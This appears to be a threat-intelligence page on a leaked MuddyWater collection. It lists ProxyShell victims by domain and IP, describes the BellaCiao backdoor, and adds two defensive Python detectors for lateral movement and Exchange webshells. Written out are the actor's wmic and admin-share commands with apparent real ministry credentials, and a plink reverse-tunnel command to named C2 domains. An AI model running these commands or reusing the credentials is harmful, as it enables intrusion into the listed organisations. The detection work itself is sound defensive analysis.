
Overview

This page documents confirmed cyber attacks identified across Episodes 1-4 of the MuddyWater intelligence collection. The attacks primarily targeted government entities, civilian companies, and media organizations using ProxyShell exploits and BellaCiao backdoor deployments.

Episode 2: ProxyShell Campaign

Turkish Foreign Ministry Attack

The threat actor successfully compromised the Turkish Foreign Ministry’s email infrastructure at eposta.mfa.gov.ct.tr.

Attack Details:
  • Target: Turkish Foreign Ministry (eposta.mfa.gov.ct.tr)
  • IP Address: 212.175.168.58
  • Attack Vector: ProxyShell exploitation
  • Webshell Deployed: aspnet_client/system_web/aspnet_client.aspx
  • Post-Exploitation: Credential harvesting, lateral movement
  • Credentials Found:
    • Username: Admin1@MFA
    • Password: KazimAtes1977+-*/!!KazimAtes1977+-*/!!
    • Secondary Account: pfsenselondra@MFA / 1234qqqQQQ
Lateral Movement Commands:
wmic /NODE:"10.20.101.17" /USER:"Admin1@MFA" /PASSWORD:"KazimAtes1977+-*/!!KazimAtes1977+-*/!!" Process Call Create "cmd.exe /c netstat -ano -p tcp >c:\windows\temp\Crashpad\log.txt 2>&1"

net use \\10.20.101.17\C$ "KazimAtes1977+-*/!!KazimAtes1977+-*/!!" /user:Admin1@MFA

Turkey - Documented Targets

A total of 41 Turkish organizations were compromised via ProxyShell:
| Organization | Domain | Status |
|---|---|---|
| Turkish Foreign Ministry | eposta.mfa.gov.ct.tr | Shell Deployed |
| Akbas Group | exchange.akbasoglu.com | Compromised |
| Magma Weld | hibrit.magmaweld.com | Compromised |
| Bahcelievler Municipality | mail.bahcelievler.bel.tr | Compromised |
| Mersin Municipality | mail.mersin.bel.tr | Government Entity |
| Aydin Governorate | smtp.aydinaski.gov.tr | Government Entity |
| KMC Group | mail.kmcgroup.com.tr | Compromised |
| Calor Group | webmail.calor.com.tr | Compromised |
Additional Turkish Targets: mail.24yemek.com.tr, mail.akartextile.com, mail.basturkcam.com.tr, mail.bilpagida.com, mail.dcaokullari.com, mail.dnstrade.com.tr, mail.duzeymode.com, antivirusgw.teknikgumruk.com.tr, mail.gopayless.com.tr, mail.itpro.com.tr, mail.mtplastech.com.tr, mail.narkonteks.com, mail.nisahastanesi.com, mail.noahsark.com.tr, mail.ozerensigorta.com, mail.taf-inter.com, mail.umur.com.tr, mail.uzmantek.com, mail.zenitled.com.tr, mail1.otaknetworks.com, msexc.aydintextil.com.tr, owa.myl.com.tr, srv0.kurgu-e.com, ulak.neutecin.com, webmail.intimesolutions.net

Iran - Documented Targets

Iranian organizations compromised during the campaign:
| IP Address | Domain | Notes |
|---|---|---|
| 109.125.132.66 | - | Shell deployed |
| 109.232.1.181 | mail server | Mail system |
| 178.252.191.163 | qudsdaily | Media organization |
| 185.189.122.142 | - | Error during exploitation |
| 217.218.21.105 | - | Anti-smuggling agency |
| 37.235.27.28 | - | Error during exploitation |
| 45.147.77.137 | - | legacyDN enumeration |
Total Iran Targets: 18+ organizations including government anti-smuggling agencies and media outlets.

Saudi Arabia - Documented Targets

Saudi organizations compromised in the campaign:
| IP/Domain | Organization | Status |
|---|---|---|
| 212.12.165.155 | - | Shell Deployed |
| 77.240.93.43 | mail server | Compromised |
| 85.184.233.203 | - | Shell Deployed |
| mail.almanahospital.com.sa | Al Mana Hospital | legacyDN enumeration |
| mail.ihcc.sa | IHCC | legacyDN enumeration |
| mail1.manafea.net | Manafea | Shell Deployed |
| mail1.solbsteel.com | Solb Steel | Compromised |
| webmail.almanahospital.com.sa | Al Mana Hospital | Failed attempt |
Additional Saudi Targets: mail.aiccp.com.sa, mail.albarakatgroup.com, mail.alrashidabetong.com, mail.arabian-homes.com, mail.goldenbrown.sa, mail.sosgroup.com, mail.tanhatmining.com, smtp.baroid-sa.com, outbound.familycare.com.sa
Total Saudi Targets: 29 organizations across healthcare, industrial, and commercial sectors.

Kuwait - Documented Targets

21 Kuwaiti organizations were targeted:
| Organization | Domain | Type |
|---|---|---|
| Kuwait Chamber of Commerce | webmail.kccec.com.kw | Government |
| Kout Cloud | mx02.koutcloud.com, mx03.koutcloud.com | Infrastructure |
| Zamzam Takaful | smg.zamzamtakaful.com | Financial |
| KFMB | mail.kfmb.com.kw | Company |
| Azzad Group | mail.azzadgroup.com.kw | Company |
| KYFCO | exch1.kyfco.com | Company |
Additional Kuwait Targets: mail.yousifi.com.kw, mail.sih-kw.com, mail.montania.org, mail.kiti.com.kw, and 10 additional IP-based targets.

Episode 3: BellaCiao Backdoor Campaign

BellaCiao Malware Overview

Variant 1: Service-based persistence
  • Service Name: “Java Update Services” / “Microsoft Exchange Services Log”
  • Path: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
  • Technique: Disguised as legitimate Microsoft/Java service
Variant 2: Web-based backdoor
  • Configuration: Port 8000, 24-hour alive time
  • Components:
    • Service: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe (hidden)
    • Plink: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.exe
    • Webserver: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1
  • C2 Domains: twittsupport.com, msn-center.uk
  • Credentials: Username: Israel / Password: Israel@123!
  • Port Forwarding: 127.0.0.1:9090:127.0.0.1:49450

Dubai Police Attack

The BellaCiao Variant 2 specifically targeted Dubai Police infrastructure.

Configuration Found:
subdomain=> dubaipolice
service name=Java Update Services
port=>8000
alive time=>24
PowerShell Connection Script:
$domain = "twittsupport.com"
$domain2 = "msn-center.uk"
$Path = "C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe"
$command = "echo Y | $Path $domain -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw Israel@123!"
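The WMI and admin-share commands from the Episode 2 lateral movement and the plink-style tunnel launched by the Dubai Police script above leave distinctive process command lines and service entries that an EDR or Sysmon pipeline can match. The following Python script is an added example, not code from the original page or from the MuddyWater collection: it turns the page's indicators (remote `wmic ... Process Call Create`, `net use \\host\C$ ... /user:`, the `-R` remote-forward plus `-pw` switches, the `C:\ProgramData\Microsoft\Diagnostic` staging directory, the two service names and the two C2 domains) into detection rules and runs them over constructed process events and a constructed service inventory. Hostnames, the event tuple format and the rule names are assumptions, and the real passwords are replaced with the placeholder `REDACTED`.

```python
import re
from dataclasses import dataclass

# Indicators taken from this page (Episode 2 lateral movement, Episode 3 BellaCiao).
BELLACIAO_DIR = r"c:\programdata\microsoft\diagnostic"
BELLACIAO_SERVICE_NAMES = {"java update services", "microsoft exchange services log"}
BELLACIAO_C2 = {"twittsupport.com", "msn-center.uk"}

# Remote process creation over WMI: wmic /NODE:"host" ... Process Call Create "..."
WMIC_REMOTE_RE = re.compile(r'/node:"?([^"\s]+)"?.*?process\s+call\s+create', re.I)
# Admin share mount with an explicit account: net use \\host\C$ ... /user:name
NET_USE_RE = re.compile(r'net\s+use\s+\\\\([^\\\s]+)\\([a-z]\$).*?/user:(\S+)', re.I)
# plink-style remote port forward and listen port, as in the Dubai Police script
PLINK_FWD_RE = re.compile(r"-R\s+([\d.]+:\d+:[\d.]+:\d+)")
PLINK_PORT_RE = re.compile(r"-P\s+(\d+)")
PLINK_PW_RE = re.compile(r"\s-pw\s")


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


def analyze_cmdline(host: str, cmdline: str) -> list[Finding]:
    """Match one process command line against the lateral-movement and tunnel indicators."""
    findings: list[Finding] = []
    low = cmdline.lower()

    m = WMIC_REMOTE_RE.search(cmdline)
    if m:
        findings.append(Finding("wmic_remote_process_create", host, f"target={m.group(1)}"))
        if "/password:" in low:
            findings.append(Finding("plaintext_credential_on_cmdline", host, "wmic /PASSWORD switch"))

    m = NET_USE_RE.search(cmdline)
    if m:
        findings.append(Finding("admin_share_mount", host,
                                f"target={m.group(1)} share={m.group(2)} user={m.group(3)}"))

    fwd = PLINK_FWD_RE.search(cmdline)
    if fwd and PLINK_PW_RE.search(cmdline):
        port = PLINK_PORT_RE.search(cmdline)
        c2 = sorted(d for d in BELLACIAO_C2 if d in low)
        staged = BELLACIAO_DIR in low  # binary launched from the BellaCiao staging directory
        findings.append(Finding(
            "bellaciao_plink_tunnel" if staged else "reverse_tunnel_with_password",
            host,
            f"forward={fwd.group(1)} port={port.group(1) if port else '?'} c2={','.join(c2) or '?'}",
        ))
    return findings


def check_service(host: str, name: str, image_path: str) -> list[Finding]:
    """Flag a service whose name or binary matches BellaCiao Variant 1/2 persistence."""
    findings: list[Finding] = []
    if name.strip('"').lower() in BELLACIAO_SERVICE_NAMES:
        findings.append(Finding("bellaciao_service_name", host, f"service={name}"))
    if image_path.strip('"').lower().startswith(BELLACIAO_DIR):
        findings.append(Finding("bellaciao_binary_path", host, f"path={image_path}"))
    return findings


def scan_events(events: list[tuple[str, str]]) -> list[Finding]:
    return [f for host, cmd in events for f in analyze_cmdline(host, cmd)]


def scan_services(services: list[tuple[str, str, str]]) -> list[Finding]:
    return [f for host, name, path in services for f in check_service(host, name, path)]


# Constructed sample telemetry (hostnames assumed, passwords replaced by REDACTED).
SAMPLE_EVENTS = [
    ("exch01", r'wmic /NODE:"10.20.101.17" /USER:"Admin1@MFA" /PASSWORD:"REDACTED" Process Call Create "cmd.exe /c netstat -ano -p tcp >c:\windows\temp\Crashpad\log.txt 2>&1"'),
    ("exch01", r'net use \\10.20.101.17\C$ "REDACTED" /user:Admin1@MFA'),
    ("exch02", r'"C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe" twittsupport.com -P 443 -C -R 127.0.0.1:9090:127.0.0.1:49450 -l Israel -pw REDACTED'),
    ("exch02", r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
]
SAMPLE_SERVICES = [
    ("exch02", "Java Update Services", r"C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe"),
    ("exch02", "wuauserv", r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS) + scan_services(SAMPLE_SERVICES):
        print(f"{f.host}: {f.rule} ({f.detail})")
```

The `net use` and `wmic` rules fire on any host, not only Exchange servers, which is intended: the page records these commands being run from the compromised mail server against an internal host (10.20.101.17), so the alert should key on the source of the command. The tunnel rule is split into a high-confidence variant (binary under the BellaCiao staging directory) and a generic one, because a remote forward with an inline password is unusual enough on a server to review even when the path differs.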

Episode 4: Ransomware Operations

Evidence of ransomware deployment activities:

Infrastructure

  • Payment Tracking: Bitcoin payment records (0-SERVICE-payment BTC.csv)
  • Service Records: Victim tracking database (0-SERVICE-Service.csv)
  • Network Data: Target network information (1-NET-Sheet1.csv)

Failed Operations Log

Shell deployment failures documented at 49 locations across:
  • Austria (At): 5 failed attempts
  • Australia (Au): 1 failed attempt
  • Azerbaijan (Az): 1 confirmed shell
  • Germany (De): Multiple attempts with mixed success
  • France (Fr): 4 targets including mail.lemstyle.ru
  • India (In): 2 targets
  • Israel (il): 3 targets including prizma-hakirot.co.il, interprom.co.il
  • South Korea (Kr): 1 target
  • Turkey (Tr): 3 targets including bilpagida.com, kmcgroup.com.tr
  • United Kingdom (Uk): 5 targets

Attack Vector Summary

ProxyShell Exploitation (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

Typical Attack Path:
  1. ProxyShell vulnerability exploitation on Microsoft Exchange servers
  2. Webshell deployment to /owa/auth/ or /aspnet_client/ directories
  3. Credential harvesting and legacyDN enumeration
  4. Lateral movement via WMI and network share access
  5. Deployment of BellaCiao backdoor for persistent access
Webshell Naming Patterns:
  • Randomized 5-10 character names: msfuj.aspx, webclient.aspx, wsrnt.aspx
  • System-themed names: OutlookOU.aspx, errorFE.aspx, logon.aspx
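Steps 1 and 2 of the attack path, together with the naming patterns above, are what a defender can pivot on in Exchange IIS logs. The following Python script is an added example, not code from the original page or from the MuddyWater collection: it parses W3C-format IIS log lines and flags the Episode 2 webshell path, any `.aspx` served from `/aspnet_client/`, unknown `.aspx` names under `/owa/auth/`, POSTs to static pages whose names the shells imitate, and the ProxyShell `autodiscover.json` request shape known from public ProxyShell write-ups (that last pattern is not from this page). The log lines and client IPs are constructed, the `OWA_AUTH_BASELINE` set is an assumption to be rebuilt from a clean Exchange install, and the rule names are mine.

```python
import re
from collections import Counter
from typing import Iterator, Optional

# Drop directories and the Episode 2 webshell path named on this page.
WEBSHELL_DIRS = ("/owa/auth/", "/aspnet_client/")
KNOWN_SHELL_PATH = "/aspnet_client/system_web/aspnet_client.aspx"
# Assumption: legitimate .aspx pages under /owa/auth/ on a clean Exchange install.
# Rebuild this from a golden image; the page's "system-themed" shell names
# (logon.aspx, errorFE.aspx) deliberately collide with entries in it.
OWA_AUTH_BASELINE = {"logon.aspx", "logoff.aspx", "errorfe.aspx"}
# ProxyShell path-confusion request shape, from public write-ups rather than this page:
# autodiscover.json with an '@' suffix in the query string.
AUTODISCOVER_RE = re.compile(r"^/autodiscover/autodiscover\.json", re.I)


def parse_iis_log(text: str) -> Iterator[dict]:
    """Yield one dict per W3C IIS log line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def classify(entry: dict) -> Optional[str]:
    """Return a rule name if the request matches a ProxyShell/webshell indicator, else None."""
    stem = entry.get("cs-uri-stem", "").lower()
    query = entry.get("cs-uri-query", "-").lower()
    method = entry.get("cs-method", "").upper()
    if AUTODISCOVER_RE.match(stem) and ("@" in query or "%40" in query):
        return "proxyshell_autodiscover_ssrf"
    if stem == KNOWN_SHELL_PATH:
        return "known_webshell_path"
    if not stem.endswith(".aspx") or not stem.startswith(WEBSHELL_DIRS):
        return None
    name = stem.rsplit("/", 1)[-1]
    if stem.startswith("/aspnet_client/"):
        # Assumption: Exchange serves no .aspx pages from this tree, so any hit is worth a look.
        return "aspx_under_aspnet_client"
    if name not in OWA_AUTH_BASELINE:
        return "unknown_aspx_under_owa_auth"
    if method == "POST" and name != "logon.aspx":
        # Assumption: only logon.aspx legitimately receives POSTs; a POST to errorFE.aspx
        # or another static page suggests a shell wearing a system-themed name.
        return "post_to_static_owa_page"
    return None


def scan_log(text: str) -> list[tuple[str, str, str]]:
    """Run classify() over a log and return (rule, client_ip, uri_stem) for each hit."""
    return [
        (rule, e.get("c-ip", "?"), e["cs-uri-stem"])
        for e in parse_iis_log(text)
        if (rule := classify(e)) is not None
    ]


def client_counts(text: str) -> dict[str, int]:
    """Hits per client IP, to surface the source of an exploitation burst."""
    return dict(Counter(ip for _, ip, _ in scan_log(text)))


# Constructed IIS log excerpt (timestamps, server and client IPs are sample values).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2021-08-15 03:12:01 10.20.101.5 POST /autodiscover/autodiscover.json @placeholder.test/ews/exchange.asmx 443 203.0.113.10 200
2021-08-15 03:12:09 10.20.101.5 POST /aspnet_client/system_web/aspnet_client.aspx - 443 203.0.113.10 200
2021-08-15 03:12:44 10.20.101.5 POST /owa/auth/msfuj.aspx - 443 203.0.113.10 200
2021-08-15 03:13:02 10.20.101.5 POST /owa/auth/logon.aspx - 443 198.51.100.7 302
2021-08-15 03:13:30 10.20.101.5 GET /owa/auth/errorFE.aspx httpCode=500 443 198.51.100.7 500
2021-08-15 03:14:10 10.20.101.5 POST /owa/auth/errorFE.aspx cmd=1 443 203.0.113.10 200
2021-08-15 03:14:55 10.20.101.5 GET /owa/ - 443 198.51.100.7 200
"""

if __name__ == "__main__":
    for rule, ip, stem in scan_log(SAMPLE_LOG):
        print(f"{ip} {rule} {stem}")
    print(client_counts(SAMPLE_LOG))
```

URL matching cannot tell a shell named `logon.aspx` or `errorFE.aspx` from the genuine file, which is the point of the system-themed naming the page describes; for those, compare the on-disk `.aspx` files under the Exchange install against hashes from a clean build and treat any modified or newer file as suspect, and use the log rules above to find the client address and time window to investigate.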

Geographic Distribution

Primary Target Countries:
  1. Turkey: 41+ organizations (Government, Private Sector)
  2. Saudi Arabia: 29 organizations (Healthcare, Industrial, Commercial)
  3. Kuwait: 21 organizations (Government, Financial, Commercial)
  4. Iran: 18+ organizations (Government, Media)
  5. UAE: Government infrastructure (Dubai Police)
  6. Global: 49+ additional targets across Europe, Asia, Middle East

Impact Assessment

Sectors Affected

  • Government: Foreign ministries, municipalities, law enforcement
  • Healthcare: Hospitals and medical facilities
  • Financial: Insurance, investment firms
  • Industrial: Manufacturing, steel, textiles
  • Media: News organizations
  • Technology: IT service providers
  • Infrastructure: Email and hosting providers

Compromise Indicators

High Confidence Compromises:
  • Turkish Foreign Ministry (confirmed credentials, lateral movement)
  • Dubai Police (BellaCiao backdoor configuration)
  • 30+ organizations with confirmed shell deployment
Medium Confidence:
  • 50+ organizations with ProxyShell vulnerability exploitation attempts
  • Multiple failed exploitation attempts indicating reconnaissance

Defender Recommendations

See the Analysis Summary page for detailed defensive recommendations.
